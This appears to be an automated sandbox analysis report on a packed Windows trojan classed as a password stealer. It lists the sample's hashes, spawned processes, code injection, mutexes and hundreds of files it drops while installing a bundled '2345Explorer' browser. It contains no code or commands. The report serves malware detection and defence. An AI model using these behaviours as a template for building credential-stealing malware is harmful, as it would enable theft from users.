MD5: a1b66422746865fa7328a33677cdcd5a
SHA1: ccd24b902fdb3d9bb328d6b5939d394c7dfca231
SHA256: 5e315ba1c7001cfa4ead5238d98234a84f4bb9422818c85bd4d4c599af5c6401
SSDeep: 196608:BNqe9sW9nn0G1Vlt2xXtSO2tIlhqCQVWsBBly4UhTclbT4tp78k1WfsibZM:BFn0sSXhqCQoiOhTclbT4tp78i 7VM
Size: 12554240 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171
Company:
Created at: 2015-06-23 16:07:39
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan-PSW. Trojan program intended for stealing users passwords.

Payload

Process activity

The Trojan creates the following process(es):

³ÉÆ·.exe:1980
2345Explorer.exe:2100
2345Explorer.exe:304
2345Explorer.exe:2108
2345Explorer.exe:2072
2345Explorer.exe:2364
2345Explorer.exe:2116
p7_k43181459_ihaJ6SGgL6cCje0drNf3dVQQJKJP.exe:332
2345explorer_k43181459.exe:1060
2345explorer_k43181459.exe:140

The Trojan injects its code into the following process(es):

%original file name%.exe:1152

Mutexes

The following mutexes were created/opened:

c:!documents and settings!adm!local settings!history!history.ie5!mshist012015072020150721!
_!SHMSFTHISTORY!_
CTF.TMD.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
CTF.Layouts.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
CTF.Asm.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
CTF.Compart.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
CTF.LBES.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
ZonesLockedCacheCounterMutex
ZonesCacheCounterMutex
ZonesCounterMutex
WininetProxyRegistryMutex
WininetConnectionMutex
WininetStartupMutex
c:!documents and settings!adm!local settings!history!history.ie5!
c:!documents and settings!adm!cookies!
c:!documents and settings!adm!local settings!temporary internet files!content.ie5!
_!MSFTHISTORY!_
__DDrawCheckExclMode__
__DDrawExclMode__
DDrawWindowListMutex
DDrawDriverObjectListMutex
RasPbFile
ShimCacheMutex

File activity

The process %original file name%.exe:1152 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M96PUVS7\stat[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BXX815CG\pic[1].gif (719 bytes)
C:\³ÉÆ·.exe (5442 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ZJVUCBW4\index[1].htm (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M96PUVS7\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GXKD4PCB\app[1].js (73 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (203 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GXKD4PCB\desktop.ini (67 bytes)
C:\2345explorer_k43181459.exe (70225 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (1564 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BXX815CG\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GXKD4PCB\core[1].php (766 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (214 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M96PUVS7\5star[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@mmstat[1].txt (168 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cnzz[1].txt (163 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ZJVUCBW4\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BXX815CG\stat[1].php (1097 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ZJVUCBW4\qb123456[1].htm (259 bytes)

The process 2345Explorer.exe:2100 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\2345Explorer\RT~C.tmp (41 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\2345Explorer (0 bytes)

The process 2345Explorer.exe:304 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\2345Explorer\Users\Default\SmartUrl.data-journal (9464 bytes)
%Documents and Settings%\%current user%\Application Data\2345Explorer\Users\Default\FavIcons.data (8168 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2345Explorer\RT~7.tmp (39 bytes)
%Documents and Settings%\%current user%\Application Data\2345Explorer\Users\Default\FavoritesUpdate.data (29 bytes)
%Documents and Settings%\%current user%\Application Data\2345Explorer\Users\Default\FavIcons.data-journal (4360 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\2345王牌软件\2345王牌浏览器\2345王牌浏览器.lnk (1 bytes)
%Documents and Settings%\%current user%\Application Data\2345Explorer\Users\Default\CrashUrl.data (2736 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\2345王牌软件\2345王牌浏览器\卸载2345王牌浏览器.lnk (1 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\2345王牌软件\2345王牌浏览器\卸载2345王牌浏览器.lnk (1 bytes)
%Documents and Settings%\%current user%\Application Data\2345Explorer\Users\Default\Download.data-journal (5636 bytes)
%Documents and Settings%\%current user%\Application Data\2345Explorer\Users\Default\Setting.cfg (29 bytes)
%Documents and Settings%\%current user%\Application Data\2345Explorer\Users\Default\Download.data (8648 bytes)
%Documents and Settings%\%current user%\Application Data\2345Explorer\Users\Default\StartPageConfig.data (408 bytes)
%Documents and Settings%\%current user%\Application Data\2345Explorer\2345Explorer.hzv (8 bytes)
%Documents and Settings%\%current user%\Application Data\2345Explorer\Users\Default\History.data (16688 bytes)
%Documents and Settings%\%current user%\Application Data\2345Explorer\Users\Default\FormData.data (29 bytes)
%Documents and Settings%\%current user%\Application Data\2345Explorer\Users\Default\SmartUrl.data (15568 bytes)
%Documents and Settings%\%current user%\Application Data\2345Explorer\Users\Default\StartPageConfig.data-journal (532 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2345Explorer\RT~9.tmp (41 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\2345王牌软件\2345王牌浏览器\2345王牌浏览器.lnk (1 bytes)
%Documents and Settings%\%current user%\Application Data\2345Explorer\Users\Default\History.data-journal (12016 bytes)
%Documents and Settings%\%current user%\Application Data\2345Explorer\Users\Default\CrashUrl.data-journal (1808 bytes)
%Documents and Settings%\%current user%\Desktop\2345王牌浏览器.lnk (1 bytes)
%Documents and Settings%\%current user%\Start Menu\2345王牌浏览器.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2345Explorer\RT~8.tmp (41 bytes)
%Documents and Settings%\%current user%\Application Data\2345Explorer\Users\Default\OnlineFav.data (29 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\2345王牌浏览器.lnk (1 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Application Data\2345Explorer\Users\Default\History.data-journal (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2345Explorer (0 bytes)
%Documents and Settings%\%current user%\Application Data\2345Explorer\Users\Default\CrashUrl.data-journal (0 bytes)
%Documents and Settings%\%current user%\Application Data\2345Explorer\Users\Default\SmartUrl.data-journal (0 bytes)
%Documents and Settings%\%current user%\Application Data\2345Explorer\Users\Default\Download.data-journal (0 bytes)
%Documents and Settings%\%current user%\Application Data\2345Explorer\Users\Default\StartPageConfig.data-journal (0 bytes)
%Documents and Settings%\%current user%\Application Data\2345Explorer\Users\Default\StartPageConfig.data (0 bytes)
%Documents and Settings%\%current user%\Application Data\2345Explorer\Users\Default\FavIcons.data-journal (0 bytes)

The process 2345Explorer.exe:2108 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\2345Explorer\2345Explorer.hzv (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2345Explorer\RT~A.tmp (453 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\2345Explorer (0 bytes)

The process 2345Explorer.exe:2072 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\2345Explorer\2345Explorer.hzv (10 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Application Data\2345Explorer\Cache\Default\Temp (0 bytes)
%Documents and Settings%\%current user%\Application Data\2345Explorer\Cache\Default\Temp\Cache (0 bytes)
%Documents and Settings%\%current user%\Application Data\2345Explorer\Cache\Default\Temp\History (0 bytes)

The process 2345Explorer.exe:2364 makes changes in the file system.
The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Application Data\2345Explorer\Cache\Default\Temp (0 bytes)
%Documents and Settings%\%current user%\Application Data\2345Explorer\Cache\Default\Temp\Cache (0 bytes)
%Documents and Settings%\%current user%\Application Data\2345Explorer\Cache\Default\Temp\History (0 bytes)

The process 2345Explorer.exe:2116 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\2345Explorer\RT~B.tmp (501 bytes)
%Documents and Settings%\%current user%\Application Data\2345Explorer\Users\Default\Statistics.data (29 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\2345Explorer (0 bytes)

The process p7_k43181459_ihaJ6SGgL6cCje0drNf3dVQQJKJP.exe:332 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\RCPackagesDb.data (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IE8Core.data (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2345explorer_k43181459.exe (1141284 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2345NecessaryPackages.ini (287 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2345pcsafe_k43181459.exe (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~HJ1.tmp (313 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\IE8Core.data (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2345explorer_k43181459.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2345pcsafe_k43181459.exe (0 bytes)

The process 2345explorer_k43181459.exe:1060 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\p7_k43181459_ihaJ6SGgL6cCje0drNf3dVQQJKJP.exe (111954 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\P7_K43181459_IHAJ6SGGL6CCJE0DRNF3DVQQJKJP.EXE (0 bytes)

The process 2345explorer_k43181459.exe:140 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\2345Soft\2345Explorer\UserCenter\images\retry_banner2.png (784 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\switch_combar_icon1.gif (1 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_yahoo.png (3 bytes)
%Program Files%\2345Soft\2345Explorer\Config\FavIcon\8FDEAD446A8D607C20207D38D669E349.ico (894 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\js\zoom.js (4 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\Wallpaper_01_1366.jpg (2392 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_xduote.png (784 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\popup_dialog_background.png (4 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_gtaobao.png (3 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\list_bg.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\2345Explorer\FavIcon\1860F34853BBC50F66BF81B679989830.ico.jpg (778 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\popup_dialog_list_icon3.gif (2 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\incognito\main_search_button_bg3.png (580 bytes)
%Documents and Settings%\%current user%\Application Data\2345Explorer\FavIcon\6E086A7049DD129DF69051413AC6AB3A.ico (1 bytes)
%Documents and Settings%\%current user%\Application Data\2345Explorer\FavIcon\6E086A7049DD129DF69051413AC6AB3A.ico.jpg (764 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\popup_dialog_list_icon.gif (1 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_gpaipai.png (3 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\main_search_bg_search.png (510 bytes)
%Program Files%\2345Soft\2345Explorer\Skins\CoralIE.skn (27504 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\gradient_top.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\2345Explorer\FavIcon\8FDEAD446A8D607C20207D38D669E349.ico (894 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\preview_plus.bmp (1 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\home\ai_taobao_big.jpg (784 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_dbaidu.png (4 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\malice.htm (3 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\popup_dialog_close.gif (70 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_gdangdang.png (11 bytes)
%Program Files%\2345Soft\2345Explorer\CoralUI2.dll (7386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr3.tmp (543342 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\ico_tt.gif (1 bytes)
%Documents and Settings%\%current user%\Application Data\2345Explorer\FavIcon\default_page.ico (1 bytes)
%Program Files%\2345Soft\2345Explorer\CoralUI.dll (17629 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_vbaidu.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\2345Explorer\FavIcon\85131C29C8F7B398A345BD7F1A51DAB1.ico (1 bytes)
%Program Files%\2345Soft\2345Explorer\CoralUpdate.dll (1742 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\icon_weather.png (7 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_isoso.png (14 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\OFLH.data (3312 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\incognito\main_search_bigicon_sogou.png (6 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\popup_dialog_edit_bg1.gif (576 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_igoogle.png (3 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\home\sina_big.jpg (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr4.tmp\RCWidgetPlugin.dll (33536 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_google.png (784 bytes)
%Documents and Settings%\%current user%\Application Data\2345Explorer\FavIcon\private.ico (1 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\js\coral_commom.js (6 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\home\qq_big.jpg (784 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\popup_dialog_edit_background.gif (625 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\main_grid_bar_blank.gif (1 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\main_grid_bar_edit.gif (1 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_isoso.png (3 bytes)
%Program Files%\2345Soft\2345Explorer\Config\FavIcon\8FDEAD446A8D607C20207D38D669E349.ico.jpg (738 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\wico_sohu.gif (104 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_soso.png (3 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\main_search_bg1.png (1 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\incognito\main_search_button_bg2.png (3 bytes)
%Program Files%\2345Soft\2345Explorer\Skins\Growth.skn (27504 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\main_search_button_bg2.png (3 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_gjingdong.png (3 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_wsoso.png (3 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\detail_btn.png (1 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\popup_dialog_list_icon1.gif (2 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\sprite_0718.png (1 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\main_grid_bar_bj.gif (1 bytes)
%Documents and Settings%\%current user%\Application Data\2345Explorer\FavIcon\F2A7BED2A1035F9E4EC022B3ECA481A8.ico (318 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\incognito\main_search_bigicon_soso.png (6 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search_sogou.png (3 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search_google.png (3 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\main_grid_item22.png (1 bytes)
%Program Files%\2345Soft\2345Explorer\Config\FavIcon\81C6AF03AC3E2B181DD99A3C1AFD1AA3.ico (2 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\wico_baidu.gif (104 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\popup_dialog_background.gif (2 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\switch_bj.gif (1 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\btn_sprite.png (8 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\Wallpaper_04_1366.jpg (3616 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\popup_dialog_list_button3.gif (1 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\wico_sogo.gif (594 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\main_search_button_bg3.png (580 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_mbaidu.png (3 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\iconMap.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\2345Explorer\FavIcon\81C6AF03AC3E2B181DD99A3C1AFD1AA3.ico (2 bytes)
%Program Files%\2345Soft\2345Explorer\CoralDownload.dll (6331 bytes)
%Program Files%\2345Soft\2345Explorer\CoralApp.dll (1789 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\popup_dialog_list_tit_hover2.gif (876 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\popup_dialog_list_icon4_2.gif (1 bytes)
%Documents and Settings%\%current user%\Application Data\2345Explorer\FavIcon\recovery.ico (1 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\css\incognito.css (5 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\js\index.js (11 bytes)
%Program Files%\2345Soft\2345Explorer\2345ExplorerReg.exe (144 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\wico_fenghuang.gif (1 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\coral404.htm (8 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\search.htm (2 bytes)
%Program Files%\2345Soft\2345Explorer\UserCenter\images\lg_sprite.png (6 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_soso.png (784 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\ico_360.gif (1 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_mgoogle.png (784 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\quan.gif (63 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\all_search_icon_baidu.gif (1 bytes)
%Program Files%\2345Soft\2345Explorer\UserCenter\css\p_login.css (1 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\home\game2_big.jpg (13 bytes)
%Documents and Settings%\%current user%\Application Data\2345Explorer\FavIcon\3D6A8AC8F2013B0D7A1EA53076E96320.ico.jpg (768 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\main_grid_item_hover1.png (2 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\main_bottombar_report3.gif (2 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_igoogle.png (784 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_google.png (3 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_none.png (140 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\popup_dialog_close2.gif (73 bytes)
%Documents and Settings%\%current user%\Application Data\2345Explorer\Users\Default\SystemUrl.data (5520 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\js\coral_myfav.js (10 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\incognito\main_search_bigicon_google.png (6 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_xverycd.png (784 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\Wallpaper_04.jpg (5520 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\main_search_xl_background1.gif (1 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_wbaidu.png (3 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\main_search_bigicon_google.png (6 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_wwiki.png (3 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\error\404_2.jpg (7 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\popup_dialog_list_tit2.gif (818 bytes)
%Program Files%\2345Soft\2345Explorer\CoralRender.dll (1614 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_xxunlei.png (3 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\Wallpaper_03_1366.jpg (3312 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_gjingdong.png (784 bytes)
%Program Files%\2345Soft\2345Explorer\Config\FavIcon\DA3E6E24050AA14E8FD334F6DA0AE9F1.ico.jpg (776 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\main_grid_bar_edit_hover.gif (1 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\main_grid_bar_blank_hover.gif (1 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_dgoogle.png (3 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\Wallpaper_pre_03.bmp (784 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\main_grid_bar_remove_hover.gif (605 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_bing.png (12 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\main_search_bigicon_sogou.png (6 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_vtudou.png (13 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_mbaidu.png (4 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\css\search.css (12 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\main_search_button_bg1.png (543 bytes)
%Program Files%\2345Soft\2345Explorer\Config\FavIcon\DA3E6E24050AA14E8FD334F6DA0AE9F1.ico (318 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\js\coral_search.js (9 bytes)
%Program Files%\2345Soft\2345Explorer\CoralDb.dll (9606 bytes)
%Program Files%\2345Soft\2345Explorer\Config\FavIcon\1860F34853BBC50F66BF81B679989830.ico (1 bytes)
%Program Files%\2345Soft\2345Explorer\Skins\Pink.skn (42222 bytes)
%Documents and Settings%\%current user%\Application Data\2345Explorer\FavIcon\85131C29C8F7B398A345BD7F1A51DAB1.ico.jpg (768 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\incognito\main_search_button_bg1.png (543 bytes)
%Program Files%\2345Soft\2345Explorer\UserCenter\images\retry_banner.png (15 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\Wallpaper_pre_02.bmp (784 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\incognito\main_search_bg1.png (1 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\wico_soso.gif (1 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\wico_google.gif (1 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\informantCenter\closeA.png (1 bytes)
%Program Files%\2345Soft\2345Explorer\Microsoft.VC80.CRT.manifest (1 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\add.png (3 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\js\coral_se.js (16 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\bdBG.png (3 bytes)
%Program Files%\2345Soft\2345Explorer\UserCenter\images\sign_btnbg.png (1 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\main_bottombar_report.gif (1 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\js\jquery.loadmask.js (1 bytes)
%Program Files%\2345Soft\2345Explorer\Addon\Capture.addon (11344 bytes)
%Program Files%\2345Soft\2345Explorer\Config\FavIcon\81C6AF03AC3E2B181DD99A3C1AFD1AA3.ico.jpg (762 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_mgoogle.png (3 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\icon_news.png (3 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\popup_dialog_list_icon4.gif (1 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\fancybox\jquery.fancybox-1.3.4.js (7 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\pop_edit.html (784 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\close_tab2.png (3 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_ibaidu.png (3 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\detail_bg.png (4 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\js\coral_clickcount.js (1 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\popup_dialog_list_tit.gif (571 bytes)
%Program Files%\2345Soft\2345Explorer\Config\FavIcon\85131C29C8F7B398A345BD7F1A51DAB1.ico (1 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_vtudou.png (3 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\home\2345_big.jpg (15 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_yahoo.png (4 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\informantCenter\popA.png (4 bytes)
%Documents and Settings%\%current user%\Application Data\2345Explorer\FavIcon\81C6AF03AC3E2B181DD99A3C1AFD1AA3.ico.jpg (762 bytes)
%Program Files%\2345Soft\2345Explorer\UserCenter\retry.htm (1 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\main_search_xl_arrow.png (269 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_bing.png (3 bytes)
%Program Files%\2345Soft\2345Explorer\Config\FavIcon\default_page.ico (1 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\main_bottombar_report2.gif (1 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\css\home.css (10 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\blank.gif (49 bytes)
%Program Files%\2345Soft\2345Explorer\CoralTrident.dll (7972 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\incognito\main_search_bigicon_baidu.png (6 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\home\taobao_big.jpg (10 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\js\png.js (5 bytes)
%Program Files%\2345Soft\2345Explorer\2345王牌浏览器免责声明.txt (3 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_wwiki.png (784 bytes)
%Documents and Settings%\%current user%\Application Data\2345Explorer\FavIcon\taskmanager.ico (1 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\bg_404.png (9 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_youdao.png (5 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\wico_qq.gif (1 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_sogou.png (5 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\blank.htm (908 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\page_white.png (416 bytes)
%Program Files%\2345Soft\2345Explorer\Lang\CoralLang_chs.dll (9606 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr4.tmp\System.dll (784 bytes)
